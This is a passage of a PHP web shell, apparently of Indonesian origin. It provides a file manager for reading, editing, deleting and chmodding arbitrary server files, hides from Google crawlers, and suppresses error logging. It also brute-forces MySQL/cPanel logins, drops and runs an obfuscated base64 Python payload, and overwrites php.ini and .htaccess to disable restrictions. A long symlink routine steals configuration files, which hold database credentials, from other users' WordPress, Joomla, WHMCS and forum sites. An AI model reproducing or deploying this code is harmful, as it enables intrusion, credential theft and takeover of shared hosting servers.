1773 echo "<tr><td>Current File : ";
1774 echo $_GET['filesrc'];
1775 echo '</tr></td></table><br />';
1776 echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
1777}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
1778 echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
1779 if($_POST['opt'] == 'chmod'){
1780 if(isset($_POST['perm'])){
1781 if(chmod($_POST['path'],$_POST['perm'])){
1782 echo '<font color="green">Change Permission Done.</font><br />';
1783 }else{
1784 echo '<font color="red">Change Permission Error.</font><br />';
1785 }
1786 }
1787 echo '<form method="POST">
1788 Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
1789 <input type="hidden" name="path" value="'.$_POST['path'].'">
1790 <input type="hidden" name="opt" value="chmod">
1791 <input type="submit" value="Go" />
1792 </form>';
1793 }elseif($_POST['opt'] == 'rename'){
1794 if(isset($_POST['newname'])){
1795 if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
1796 echo '<font color="green">Change Name Done.</font><br />';
1797 }else{
1798 echo '<font color="red">Change Name Error.</font><br />';
1799 }
1800 $_POST['name'] = $_POST['newname'];
1801 }
1802 echo '<form method="POST">
1803 New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
1804 <input type="hidden" name="path" value="'.$_POST['path'].'">
1805 <input type="hidden" name="opt" value="rename">
1806 <input type="submit" value="Go" />
1807 </form>';
1808 }elseif($_POST['opt'] == 'edit'){
1809 if(isset($_POST['src'])){
1810 $fp = fopen($_POST['path'],'w');
1811 if(fwrite($fp,$_POST['src'])){
1812 echo '<font color="green">Edit File Done.</font><br />';
1813 }else{
1814 echo '<font color="red">Edit File Error.</font><br />';
1815 }
1816 fclose($fp);
1817 }
1818 echo '<form method="POST">
1819 <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
1820 <input type="hidden" name="path" value="'.$_POST['path'].'">
1821 <input type="hidden" name="opt" value="edit">
1822 <input type="submit" value="Go" />
1823 </form>';
1824 }
1825 echo '</center>';
1826}else{
1827 echo '</table><br /><center>';
1828 if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
1829 if($_POST['type'] == 'dir'){
1830 if(rmdir($_POST['path'])){
1831 echo '<font color="green">Delete Dir Done.</font><br />';
1832 }else{
1833 echo '<font color="red">Delete Dir Error.</font><br />';
1834 }
1835 }elseif($_POST['type'] == 'file'){
1836 if(unlink($_POST['path'])){
1837 echo '<font color="green">Delete File Done.</font><br />';
1838 }else{
1839 echo '<font color="red">Delete File Error.</font><br />';
1840 }
1841 }
1842 }
1843 echo '</center>';
1844 $scandir = scandir($path);
1845 echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
1846 <tr class="first">
1847 <td><center>Name</center></td>
1848 <td><center>Size</center></td>
1849 <td><center>Permissions</center></td>
1850 <td><center>Options</center></td>
1851 </tr>';
1852
1853 foreach($scandir as $dir){
1854 if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
1855 echo "<tr>
1856 <td><a href=\"?mini_shell&path=$path/$dir\">$dir</a></td>
1857 <td><center>--</center></td>
1858 <td><center>";
1859 if(is_writable("$path/$dir")) echo '<font color="green">';
1860 elseif(!is_readable("$path/$dir")) echo '<font color="red">';
1861 echo permsa("$path/$dir");
1862 if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
1863
1864 echo "</center></td>
1865 <td><center><form method=\"POST\" action=\"?mini_shell&option&path=$path\">
1866 <select name=\"opt\">
1867 <option value=\"\"></option>
1868 <option value=\"delete\">Delete</option>
1869 <option value=\"chmod\">Chmod</option>
1870 <option value=\"rename\">Rename</option>
1871 </select>
1872 <input type=\"hidden\" name=\"type\" value=\"dir\">
1873 <input type=\"hidden\" name=\"name\" value=\"$dir\">
1874 <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
1875 <input type=\"submit\" value=\">\" />
1876 </form></center></td>
1877 </tr>";
1878 }
1879 echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
1880 foreach($scandir as $file){
1881 if(!is_file("$path/$file")) continue;
1882 $size = filesize("$path/$file")/1024;
1883 $size = round($size,3);
1884 if($size >= 1024){
1885 $size = round($size/1024,2).' MB';
1886 }else{
1887 $size = $size.' KB';
1888 }
1889
1890 echo "<tr>
1891 <td><a href=\"?mini_shell&filesrc=$path/$file&path=$path\">$file</a></td>
1892 <td><center>".$size."</center></td>
1893 <td><center>";
1894 if(is_writable("$path/$file")) echo '<font color="green">';
1895 elseif(!is_readable("$path/$file")) echo '<font color="red">';
1896 echo permsa("$path/$file");
1897 if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
1898 echo "</center></td>
1899 <td><center><form method=\"POST\" action=\"?mini_shell&option&path=$path\">
1900 <select name=\"opt\">
1901 <option value=\"\"></option>
1902 <option value=\"delete\">Delete</option>
1903 <option value=\"chmod\">Chmod</option>
1904 <option value=\"rename\">Rename</option>
1905 <option value=\"edit\">Edit</option>
1906 </select>
1907 <input type=\"hidden\" name=\"type\" value=\"file\">
1908 <input type=\"hidden\" name=\"name\" value=\"$file\">
1909 <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
1910 <input type=\"submit\" value=\">\" />
1911 </form></center></td>
1912 </tr>";
1913 }
1914 echo '</table>
1915 </div>';
1916}
1917echo '
1918</BODY>
1919</HTML>';
1920
1921
1922exit;
1923}
1924else if(isset($_GET['cp']))
1925{
1926
1927
1928$default_action = 'FilesMan';
1929@define('SELF_PATH', __FILE__);
1930if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
1931 header('HTTP/1.0 404 Not Found');
1932 exit;
1933}
1934@session_start();
1935@error_reporting(0);
1936@ini_set('error_log',NULL);
1937@ini_set('log_errors',0);
1938@ini_set('max_execution_time',0);
1939@set_time_limit(0);
1940@set_magic_quotes_runtime(0);
1941@define('VERSION', '2.1');
1942if( get_magic_quotes_gpc() ) {
1943 function stripslashes_array($array) {
1944 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
1945 }
1946 $_POST = stripslashes_array($_POST);
1947}
1948
1949
1950@set_time_limit(0);
1951@error_reporting(0);
1952$login_time = 3600 * 24 * 7;
1953$hijau = array("#00FF00", "#006400", "#888888");
1954$merah = array("#FF0000", "#640000", "#888888");
1955$biru = array("#0000FF", "#000064", "#888888");
1956$kuning = array("#FFFF00", "#646400", "#888888");
1957$cyan = array("#00FFFF", "#006464", "#888888");
1958$pink = array("#FF00FF", "#640064", "#888888");
1959$theme = "hijau";
1960if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
1961switch(isset($_GET['x'])){
1962case 'green':
1963if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
1964$theme = "hijau";
1965setcookie("theme", $theme ,time() + $login_time);
1966break;
1967case 'red':
1968if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
1969$theme = "merah";
1970setcookie("theme", $theme ,time() + $login_time);
1971break;
1972case 'blue':
1973if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
1974$theme = "biru";
1975setcookie("theme", $theme ,time() + $login_time);
1976break;
1977case 'yellow':
1978if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
1979$theme = "kuning";
1980setcookie("theme", $theme ,time() + $login_time);
1981break;
1982case 'cyan':
1983if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
1984$theme = "cyan";
1985setcookie("theme", $theme ,time() + $login_time);
1986break;
1987case 'pink':
1988if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
1989$theme = "pink";
1990setcookie("theme", $theme ,time() + $login_time);
1991break;
1992}
1993if($theme == "hijau")
1994{$color = $hijau;}
1995elseif($theme == "merah")
1996{$color = $merah;}
1997elseif($theme == "biru")
1998{$color = $biru;}
1999elseif($theme == "kuning")
2000{$color = $kuning;}
2001elseif($theme == "cyan")
2002{$color = $cyan;}
2003else
2004{$color = $pink;}
2005echo '<head>
2006<style type="text/css">
2007<!--
2008body {
2009 background-color: #000000;
2010 font-family: Verdana;
2011 font-size: 13px;
2012 color: #EB4949;
2013 margin:5px;
2014}
2015input,textarea,select{
2016color: #EB4949;
2017font-size: 13px;
2018border: 1px solid #EB4949;
2019background-color: #080808;
2020}
2021input:hover,textarea:hover,select:hover{
2022color: #EB4949;
2023font-size: 13px;
2024border: 1px solid #EB4949;
2025background-color: #080808;
2026}
2027a {
2028 background-color: #000000;
2029 vertical-align: bottom;
2030 text-decoration: none;
2031 font-size: 13px;
2032 color:#EB4949;
2033}
2034a:hover {
2035 background-color: #080808;
2036 vertical-align: bottom;
2037 text-decoration: none;
2038 font-size: 13px;
2039 color:#EB4949;
2040}
2041.label {
2042 font-size: 13px;
2043 color: #EB4949;
2044 padding:3px;
2045}
2046td {
2047border-bottom:2px solid #EB4949;
2048background:#222;
2049}
2050-->
2051</style>
2052</head>
2053';
2054if(isset($_POST['page']) == 'find')
2055{
2056if(isset($_POST['usernames']) && isset($_POST['passwords']))
2057{
2058 if($_POST['type'] == 'passwd'){
2059 $e = explode("\n",$_POST['usernames']);
2060 foreach($e as $value){
2061 $k = explode(":",$value);
2062 $username .= $k['0']." ";
2063 }
2064 }elseif($_POST['type'] == 'simple'){
2065 $username = str_replace("\n",' ',$_POST['usernames']);
2066 }
2067 $a1 = explode(" ",$username);
2068 $a2 = explode("\n",$_POST['passwords']);
2069 $id2 = count($a2);
2070 $ok = 0;
2071 foreach($a1 as $user )
2072 {
2073 if($user !== '')
2074 {
2075 $user=trim($user);
2076 for($i=0;$i<=$id2;$i++)
2077 {
2078 $pass = trim($a2[$i]);
2079 if(@mysql_connect('localhost',$user,$pass))
2080 {
2081 echo "Virus Sites ~~~ User : (<font color='#EB4949'>$user</font>) Pass : (<font color='#EB4949'>$pass</font>)<br />";
2082 $ok++;
2083 }
2084 }
2085 }
2086 }
2087 echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><hr noshade size=1>";
2088 echo "<center>[Done] : <font color='#EB4949'>You Found</font> $ok <font color='#EB4949'>CPanel,</font> <a href=".$_SERVER['PHP_SELF']." style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
2089 exit;
2090}
2091}
2092if(isset($_POST['pass1']) == 'password'){
2093error_reporting(0);
2094mkdir('config',0755);
2095$cp =
2096'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';
2097$file = fopen("cp.py","w+");
2098$write = fwrite ($file , htmlspecialchars_decode(gzinflate(base64_decode($cp))));
2099fclose($file);
2100chmod("cp.py",0755);
2101$url = $_POST['url'];
2102echo"<center>
2103<textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
2104system("python cp.py $url config");
2105unlink ('cp.py');
2106echo"</textarea>
2107</center>";
2108echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><br/><center>[Done] : <span style='color:#EB4949;'>Successfull, </span> <a href=".$_SERVER['PHP_SELF']." style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
2109exit;
2110}
2111if(isset($_POST['matikan']) =='sekatan'){
2112@error_reporting(0);
2113$phpini =
2114'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
2115$file = fopen("php.ini","w+");
2116$write = fwrite ($file ,base64_decode($phpini));
2117fclose($file);
2118$htaccess =
2119'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
2120$file = fopen(".htaccess","w+");
2121$write = fwrite ($file ,base64_decode($htaccess));
2122echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><br/><center>[Done] : <span style='color:".$color[0].";'>Successfull, </span> <a href=".$_SERVER['PHP_SELF']." style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
2123exit;
2124}
2125if(isset($_POST['mendapatkan']) == 'passwd'){
2126@set_magic_quotes_runtime(0);
2127ob_start();
2128error_reporting(0);
2129@set_time_limit(0);
2130@ini_set('max_execution_time',0);
2131@ini_set('output_buffering',0);
2132$fn = $_POST['foldername'];
2133function syml($usern,$pdomain)
2134 {
2135 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~MyBB.txt');
2136 symlink('/home/'.$usern.'/public_html/sites/default/settings.php',$pdomain.'~~Drupal.txt');
2137 symlink('/home/'.$usern.'/public_html/includes/configure.php',$pdomain.'~~Oscommerce.txt');
2138 symlink('/home/'.$usern.'/public_html/lib/config.php',$pdomain.'~~Balitbang.txt');
2139 symlink('/home/'.$usern.'/public_html/config/koneksi.php',$pdomain.'~~Lokomedia.txt');
2140 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2141 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2142 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2143 symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
2144 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2145 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2146 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2147 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2148 symlink('/home/'.$usern.'/public_html/wp/wp-config.php',$pdomain.'~~Wordpress3.txt');
2149 symlink('/home/'.$usern.'/public_html/home/wp-config.php',$pdomain.'~~Wordpress4.txt');
2150 symlink('/home/'.$usern.'/public_html/main/wp-config.php',$pdomain.'~~Wordpress5.txt');
2151 symlink('/home/'.$usern.'/public_html/site/wp-config.php',$pdomain.'~~Wordpress6.txt');
2152 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2153 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2154 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2155 symlink('/home/'.$usern.'/public_html/main/configuration.php',$pdomain.'~~Joomla4.txt');
2156 symlink('/home/'.$usern.'/public_html/home/configuration.php',$pdomain.'~~Joomla5.txt');
2157 symlink('/home/'.$usern.'/public_html/site/configuration.php',$pdomain.'~~Joomla6.txt');
2158 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2159 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2160 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2161 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2162 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2163 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2164 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2165 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2166 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2167 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~Other1.txt');
2168 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~Other2.txt');
2169 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2170 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~Other3.txt');
2171 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~Other4.txt');
2172 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2173 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~Other5.txt');
2174 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2175 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2176 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2177 symlink('/home2/'.$usern.'/public_html/inc/config.php',$pdomain.'~~MyBB.txt');
2178 symlink('/home2/'.$usern.'/public_html/sites/default/settings.php',$pdomain.'~~Drupal.txt');
2179 symlink('/home2/'.$usern.'/public_html/includes/configure.php',$pdomain.'~~Oscommerce.txt');
2180 symlink('/home2/'.$usern.'/public_html/lib/config.php',$pdomain.'~~Balitbang.txt');
2181 symlink('/home2/'.$usern.'/public_html/config/koneksi.php',$pdomain.'~~Lokomedia.txt');
2182 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2183 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2184 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2185 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
2186 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2187 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2188 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2189 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2190 symlink('/home2/'.$usern.'/public_html/wp/wp-config.php',$pdomain.'~~Wordpress3.txt');
2191 symlink('/home2/'.$usern.'/public_html/home/wp-config.php',$pdomain.'~~Wordpress4.txt');
2192 symlink('/home2/'.$usern.'/public_html/main/wp-config.php',$pdomain.'~~Wordpress5.txt');
2193 symlink('/home2/'.$usern.'/public_html/site/wp-config.php',$pdomain.'~~Wordpress6.txt');
2194 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2195 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2196 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2197 symlink('/home2/'.$usern.'/public_html/main/configuration.php',$pdomain.'~~Joomla4.txt');
2198 symlink('/home2/'.$usern.'/public_html/home/configuration.php',$pdomain.'~~Joomla5.txt');
2199 symlink('/home2/'.$usern.'/public_html/site/configuration.php',$pdomain.'~~Joomla6.txt');
2200 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2201 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2202 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2203 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2204 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2205 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2206 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2207 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2208 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2209 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~Other1.txt');
2210 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~Other2.txt');
2211 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2212 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~Other3.txt');
2213 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~Other4.txt');
2214 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2215 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~Other5.txt');
2216 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2217 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2218 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2219 symlink('/home3/'.$usern.'/public_html/inc/config.php',$pdomain.'~~MyBB.txt');
2220 symlink('/home3/'.$usern.'/public_html/sites/default/settings.php',$pdomain.'~~Drupal.txt');
2221 symlink('/home3/'.$usern.'/public_html/includes/configure.php',$pdomain.'~~Oscommerce.txt');
2222 symlink('/home3/'.$usern.'/public_html/lib/config.php',$pdomain.'~~Balitbang.txt');
2223 symlink('/home3/'.$usern.'/public_html/config/koneksi.php',$pdomain.'~~Lokomedia.txt');
2224 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2225 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2226 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2227 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
2228 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2229 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2230 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2231 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2232 symlink('/home3/'.$usern.'/public_html/wp/wp-config.php',$pdomain.'~~Wordpress3.txt');
2233 symlink('/home3/'.$usern.'/public_html/home/wp-config.php',$pdomain.'~~Wordpress4.txt');
2234 symlink('/home3/'.$usern.'/public_html/main/wp-config.php',$pdomain.'~~Wordpress5.txt');
2235 symlink('/home3/'.$usern.'/public_html/site/wp-config.php',$pdomain.'~~Wordpress6.txt');
2236 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2237 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2238 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2239 symlink('/home3/'.$usern.'/public_html/main/configuration.php',$pdomain.'~~Joomla4.txt');
2240 symlink('/home3/'.$usern.'/public_html/home/configuration.php',$pdomain.'~~Joomla5.txt');
2241 symlink('/home3/'.$usern.'/public_html/site/configuration.php',$pdomain.'~~Joomla6.txt');
2242 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2243 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2244 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2245 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2246 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2247 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2248 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2249 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2250 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2251 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~Other1.txt');
2252 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~Other2.txt');
2253 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2254 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~Other3.txt');
2255 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~Other4.txt');
2256 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
